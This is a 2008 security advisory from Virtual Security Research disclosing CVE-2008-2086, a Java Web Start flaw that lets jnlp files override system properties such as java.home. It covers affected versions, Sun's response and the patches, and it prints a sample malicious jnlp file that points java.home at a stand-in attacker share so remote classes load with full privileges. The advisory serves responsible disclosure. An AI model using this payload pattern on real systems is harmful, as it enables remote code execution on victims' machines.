-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=- Advisory Name: Java Web Start File Inclusion via System Properties Override Release Date: 2008-12-03 Application: Sun Java Runtime Environment / Java Web Start Versions: See below Severity: High Author: Timothy D. Morgan <tmorgan {a} vsecurity.com> Vendor Status: Patch Released [3] CVE Candidate: CVE-2008-2086 Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=- Product Description - ------------------- - From [1]: "Using Java Web Start technology, standalone Java software applications can be deployed with a single click over the network. Java Web Start ensures the most current version of the application will be deployed, as well as the correct version of the Java Runtime Environment (JRE)." Vulnerability Overview - ---------------------- On March 27th, VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site. Product Background - ------------------ Java Web Start (JWS) applications are launched through specially formatted XML files hosted on web sites with a "jnlp" file extension. These files reference one or more "jar" files which are meant to be downloaded and executed by client systems. JWS applications are run in unprivileged mode by default but may be run with full user privileges if the jnlp file requests this access. Privileged JWS applications must have each jar file signed by the same trusted author in order to be executed. However, jnlp files are not signed and may be hosted by third-party web sites. In addition to specifying application components, the jnlp specification permits application authors to supply certain System properties which may be retrieved by the application through the System.getProperty() and System.getProperties() methods. Besides any user-supplied properties, the Java VM also provides access to a number of sensitive runtime settings through this interface. More information on the jnlp format may be found in [2]. Vulnerability Details - --------------------- VSR discovered an unsafe behavior in the way properties are interpreted when specified in jnlp files. In certain versions of the Java Runtime Engine (JRE), values supplied through jnlp files override existing system defaults. Thus far, VSR has verified the following System properties may be overridden: java.home java.ext.dirs user.home Of particular interest are the java.home and java.ext.dirs properties. If an attacker could lure a victim to open a malicious jnlp file which references a trusted application, it may be executed without any confirmation by the user. However, as the application attempts to load classes, it may trust the malicous java.home and/or java.ext.dirs value. These paths could point to a malicious local or remote JRE or extensions installation. It appears that under Windows, UNC network paths may be used for the java.home value. It is not yet known whether or not UNC paths may be used for java.ext.dirs. During testing, VSR found that Java Cryptography Extension (JCE) classes failed to load when java.home was set to an invalid path. However, by setting this path to network share which hosted a valid JRE installation, the JCE classes loaded correctly. If such a network share were hosted by the attacker, then arbitrary code could potentially be loaded without restrictions, unbeknownst to the victim. The following XML shows what a malicious jnlp file might look like. Note that the malicious jnlp file would likely be very similar to the ones users normally rely on with certain properties overriden in the resources section. <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp"> <information> <title>Trusted Application</title> <vendor>Trusted Vendor</vendor> <description>Trusted Application by Trusted Vendor</description> <homepage href="http://trusted.example.org/" /> <offline-allowed /> </information> <security><all-permissions /></security> <resources> <j2se version="1.5+" /> <!-- Next line overrides the JRE's java.home System property --> <property name="java.home" value="\\evil.example.com\jre" /> <jar href="signed-and-trusted-jce-dependent-library.jar" /> </resources> <application-desc main-class="org.example.trusted.app.StartApp" /> </jnlp> To fully exploit this specific attack vector, an attacker would need to remotely or locally host a malicious version of classes used by a trusted application and then lure a user into opening a malicious jnlp file. A firewall installed between the attacker and victim could mitigate this issue if the victim's machine were restricted from accessing the hosted network share. Note that certain JWS applications may trust other System properties, such as user.home, and use them in ways which could be exploited in application-specific variants of this attack. Versions Affected - ----------------- During testing, VSR found the following JRE versions to be vulnerable: * 1.5.0_15 on Windows * 1.6.0 on Windows * 1.5.0_13-b05-237 on Mac OS X (distributed by Apple) Version 1.6.0_05 on Windows did not appear to be vulnerable. However, Sun recommends that any installations with the following versions be updated: * JDK and JRE 6 Update 10 and earlier * JDK and JRE 5.0 Update 16 and earlier * SDK and JRE 1.4.2_18 and earlier Sun reports that JRE 1.3.x is not affected, nor is JRE 6 Update 7 for Intel Itanium. For more information on versions affected and updates, see [3]. Vendor Response - --------------- The following timeline details Sun's response to the reported issue: 2008-03-28 Sun was provided a draft advisory. 2008-03-28 An initial response was received from Sun. 2008-04-11 Sun reported that the issue could not be reproduced. 2008-04-11 VSR provided Sun additional exploit details. 2008-04-29 Sun reported the issue was reproduced and assigned an internal issue tracking number of CR 6694892. 2008-12-03 Sun Alert 244988 was released with an associated security update. Sun Alert 244988 may be obtained at: http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1 Recommendation - -------------- Apply the JRE update as soon as possible. The issue is fixed in: * JDK and JRE 6 Update 11 or later * JDK and JRE 5.0 Update 17 or later * SDK and JRE 1.4.2_19 or later Review Sun Alert 244988 [3] for information on how to temporarily disable Java Web Start to work around this issue. Common Vulnerabilities and Exposures (CVE) Information - ------------------------------------------------------ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2008-2086 to this issue. This is a candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - ---------------- Thanks to George Gal for assistance in testing. VSR would like to thank Sun for cooperating in the patch development process. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=- References: 1. Java Web Start Technology http://java.sun.com/products/javawebstart/ 2. Java Web Start Architecture JNLP Specification & API Documentation http://java.sun.com/products/javawebstart/download-spec.html 3. Sun Alert 244988 http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=- Copyright 2008 Virtual Security Research, LLC. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJN1kCQ1RSUNR+T+gRAl6TAJ9LmdTw8S4K3RMpgseiw/AkHUc81ACeK+pn cXqD3636+kFoMIUNlNhVZUw= =yv7u -----END PGP SIGNATURE-----